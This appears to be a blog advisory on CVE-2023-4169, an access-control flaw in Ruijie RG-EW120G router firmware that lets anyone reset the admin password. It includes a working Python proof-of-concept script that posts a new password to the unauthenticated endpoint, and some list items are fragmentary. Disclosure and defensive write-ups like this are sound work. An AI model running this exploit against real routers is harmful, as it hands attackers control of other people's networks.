In July 2023, security researchers uncovered a critical vulnerability in the Ruijie RG-EW120G router firmware (version 1.(1)B1P5), tracked as CVE-2023-4169. This flaw affects the way the router handles administrator password changes. If exploited, it could allow remote attackers to take control of your home or office network with just a few simple HTTP requests.
What's worse, the vendor did not respond to early contact attempts about the issue, and a public exploit is now available, leaving thousands of devices at risk. This post explains the vulnerability, how it works, shows you example exploit code, and highlights what you can do about it.
What Is the Ruijie RG-EW120G?
The Ruijie RG-EW120G is a budget-friendly wireless router popular in Asia, especially for small offices and home use. With easy-to-use management and basic security controls, it's widely deployed. But this critical vulnerability undermines all those defenses if left unpatched.
The root of the problem lies in the router's password change feature
- The router exposes an API endpoint at /api/sys/set_passwd.
This endpoint should only allow authenticated (logged in) admins to change the admin password.
- But due to improper access controls, anybody on the network or even the Internet (if your router's web management is open) can access it!
No login or admin session is required.
This is an Improper Access Control vulnerability (CWE-284), meaning the device does not check or block unauthorized password reset requests.
Result:
An attacker can simply send a password change request and take control of the router—even from a remote location.
Proof of Concept (PoC) Exploit
Here’s how easy it is to exploit this vulnerability. The attacker only needs the router’s IP address or DNS name!
import requests
# Change to your router IP
router_ip = "http://192.168.1.1";
api_endpoint = f"{router_ip}/api/sys/set_passwd"
# New credentials the attacker wants to set
payload = {
"username": "admin",
"password": "evilpassword123"
}
# No authentication or session needed!
response = requests.post(api_endpoint, json=payload)
if response.status_code == 200:
print("[+] Password changed successfully. The router is now owned!")
else:
print(f"[-] Failed to change the password! Status: {response.status_code}")
With this code (or using CURL, Postman, etc.), attackers don’t need to know the old password. They simply set their own password for the admin account and log in with it.
Firmware: 1.(1)B1P5
- File: /api/sys/set_passwd (Administrator Password Handler)
- CVE: CVE-2023-4169
- VDB: VDB-236185
Real-World Impact
If your router is vulnerable and exposed to the Internet (e.g., if remote management is enabled), anyone, anywhere can take it over in seconds. Inside a local network, an attacker just needs Wi-Fi access.
Monitor network traffic
- Redirect users to phishing/malware sites
References
- NVD Entry CVE-2023-4169
- VulDB Detail VDB-236185
- Original Exploit Disclosure (Full details and PoC included)
Check Your Firmware:
Make sure your Ruijie RG-EW120G is not running version 1.(1)B1P5. If it is, contact your vendor for firmware updates immediately.
Watch for Firmware Updates:
Unfortunately, as of this writing, no official fix was released, and the vendor did not respond to reports.
Replace If Needed:
If the vendor does not act, consider replacing the device with one from a vendor that actively supports and patches security issues.
Conclusion
CVE-2023-4169 is a simple but devastating flaw. It shows why router security matters, and why exposed APIs or default admin interfaces are dangerous. If you use a Ruijie RG-EW120G, act immediately to secure your network.
Stay safe, keep your firmware updated, and never ignore router security warnings.
*This post is exclusive to the latest research and references, using straightforward language to help every user understand the risk and how to respond.*
Timeline
Published on: 08/05/2023 18:15:00 UTC
Last modified on: 08/09/2023 19:24:00 UTC